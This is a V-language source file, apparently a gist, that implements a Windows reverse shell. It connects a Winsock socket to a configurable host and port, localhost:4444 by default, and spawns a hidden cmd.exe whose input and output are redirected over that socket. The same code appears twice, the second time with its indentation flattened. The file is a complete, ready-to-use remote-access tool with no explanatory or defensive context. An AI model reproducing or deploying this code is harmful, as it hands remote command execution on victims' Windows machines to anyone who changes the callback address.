qtc-de/windows-reverse-shell.v

## windows-reverse-shell.v
#flag -lws2_32
#include "winsock2.h"

struct WSADATA {
mut:
	w_version        u16
	w_high_version   u16
	i_max_sockets    u16
	i_max_udp_dg     u16
	lp_vendor_info   &string = 0
	sz_description   [257]char
	sz_system_status [129]char
}

struct SOCKADDR_IN {
mut:
	sin_family u16
	sin_port   u16
	sin_addr   u32
	sin_zero   [8]char
}

struct StartupInfo {
mut:
	cb                 u32
	lp_reserved        &u16
	lp_desktop         &u16
	lp_title           &u16
	dw_x               u32
	dw_y               u32
	dw_x_size          u32
	dw_y_size          u32
	dw_x_count_chars   u32
	dw_y_count_chars   u32
	dw_fill_attributes u32
	dw_flags           u32
	w_show_window      u16
	cb_reserved2       u16
	lp_reserved2       &byte
	h_std_input        voidptr
	h_std_output       voidptr
	h_std_error        voidptr
}

struct ProcessInformation {
mut:
	h_process     voidptr
	h_thread      voidptr
	dw_process_id u32
	dw_thread_id  u32
}

fn C.WSAStartup(u16, &WSADATA) int
fn C.WSACleanup() int
fn C.WSASocketA(i32, i32, i32, voidptr, u32, u32) voidptr
fn C.connect(voidptr, &SOCKADDR_IN, int) int
fn C.inet_addr(&char) u32
fn C.htons(u16) u16
fn C.WSAGetLastError() i32
fn C.closesocket(voidptr) int
fn C.CreateProcessW(lpApplicationName &u16, lpCommandLine &u16, lpProcessAttributes voidptr, lpThreadAttributes voidptr, bInheritHandles bool, dwCreationFlags u32, lpEnvironment voidptr, lpCurrentDirectory &u16, lpStartupInfo voidptr, lpProcessInformation voidptr) bool
fn C.GetLastError() u32

fn main() {
	shell(c'127.0.0.1', 4444)
}

fn shell(host &char, port u16) {
	data := WSADATA{}
	mut error := C.WSAStartup(u16(0x202), &data)

	if error != 0 {
		println('[-] WSAStartup return value: $error')
		return
	}

	socket := C.WSASocketA(C.AF_INET, C.SOCK_STREAM, 0, 0, 0, 0)
	if socket == C.INVALID_SOCKET {
		msg := C.WSAGetLastError()
		println('[-] WSASocket error: $msg')
		return
	}

	mut addr := SOCKADDR_IN{}
	addr.sin_family = 2
	addr.sin_addr = C.inet_addr(host)
	addr.sin_port = C.htons(port)

	error = C.connect(socket, &addr, sizeof(C.SOCKADDR_IN))
	if error != 0 {
		println('[-] WSA connect error: $error')
		return
	}

	mut start_info := StartupInfo{
		lp_reserved2: 0
		lp_reserved: 0
		lp_desktop: 0
		lp_title: 0
		cb: sizeof(C.PROCESS_INFORMATION)
	}

	mut proc_info := ProcessInformation{}

	start_info.h_std_input = socket
	start_info.h_std_output = socket
	start_info.h_std_error = socket
	start_info.dw_flags = u32(C.STARTF_USESTDHANDLES)

	create_process_ok := C.CreateProcessW(0, 'cmd.exe'.to_wide(), 0, 0, C.TRUE, C.CREATE_NO_WINDOW,
		0, 0, voidptr(&start_info), voidptr(&proc_info))
	C.closesocket(socket)

	if !create_process_ok {
		perror := C.GetLastError()
		println('[-] CreateProcessW error: $perror')
	}
}
	#flag -lws2_32
	#include "winsock2.h"

	struct WSADATA {
	mut:
	w_version u16
	w_high_version u16
	i_max_sockets u16
	i_max_udp_dg u16
	lp_vendor_info &string = 0
	sz_description [257]char
	sz_system_status [129]char
	}

	struct SOCKADDR_IN {
	mut:
	sin_family u16
	sin_port u16
	sin_addr u32
	sin_zero [8]char
	}

	struct StartupInfo {
	mut:
	cb u32
	lp_reserved &u16
	lp_desktop &u16
	lp_title &u16
	dw_x u32
	dw_y u32
	dw_x_size u32
	dw_y_size u32
	dw_x_count_chars u32
	dw_y_count_chars u32
	dw_fill_attributes u32
	dw_flags u32
	w_show_window u16
	cb_reserved2 u16
	lp_reserved2 &byte
	h_std_input voidptr
	h_std_output voidptr
	h_std_error voidptr
	}

	struct ProcessInformation {
	mut:
	h_process voidptr
	h_thread voidptr
	dw_process_id u32
	dw_thread_id u32
	}

	fn C.WSAStartup(u16, &WSADATA) int
	fn C.WSACleanup() int
	fn C.WSASocketA(i32, i32, i32, voidptr, u32, u32) voidptr
	fn C.connect(voidptr, &SOCKADDR_IN, int) int
	fn C.inet_addr(&char) u32
	fn C.htons(u16) u16
	fn C.WSAGetLastError() i32
	fn C.closesocket(voidptr) int
	fn C.CreateProcessW(lpApplicationName &u16, lpCommandLine &u16, lpProcessAttributes voidptr, lpThreadAttributes voidptr, bInheritHandles bool, dwCreationFlags u32, lpEnvironment voidptr, lpCurrentDirectory &u16, lpStartupInfo voidptr, lpProcessInformation voidptr) bool
	fn C.GetLastError() u32

	fn main() {
	shell(c'127.0.0.1', 4444)
	}

	fn shell(host &char, port u16) {
	data := WSADATA{}
	mut error := C.WSAStartup(u16(0x202), &data)

	if error != 0 {
	println('[-] WSAStartup return value: $error')
	return
	}

	socket := C.WSASocketA(C.AF_INET, C.SOCK_STREAM, 0, 0, 0, 0)
	if socket == C.INVALID_SOCKET {
	msg := C.WSAGetLastError()
	println('[-] WSASocket error: $msg')
	return
	}

	mut addr := SOCKADDR_IN{}
	addr.sin_family = 2
	addr.sin_addr = C.inet_addr(host)
	addr.sin_port = C.htons(port)

	error = C.connect(socket, &addr, sizeof(C.SOCKADDR_IN))
	if error != 0 {
	println('[-] WSA connect error: $error')
	return
	}

	mut start_info := StartupInfo{
	lp_reserved2: 0
	lp_reserved: 0
	lp_desktop: 0
	lp_title: 0
	cb: sizeof(C.PROCESS_INFORMATION)
	}

	mut proc_info := ProcessInformation{}

	start_info.h_std_input = socket
	start_info.h_std_output = socket
	start_info.h_std_error = socket
	start_info.dw_flags = u32(C.STARTF_USESTDHANDLES)

	create_process_ok := C.CreateProcessW(0, 'cmd.exe'.to_wide(), 0, 0, C.TRUE, C.CREATE_NO_WINDOW,
	0, 0, voidptr(&start_info), voidptr(&proc_info))
	C.closesocket(socket)

	if !create_process_ok {
	perror := C.GetLastError()
	println('[-] CreateProcessW error: $perror')
	}
	}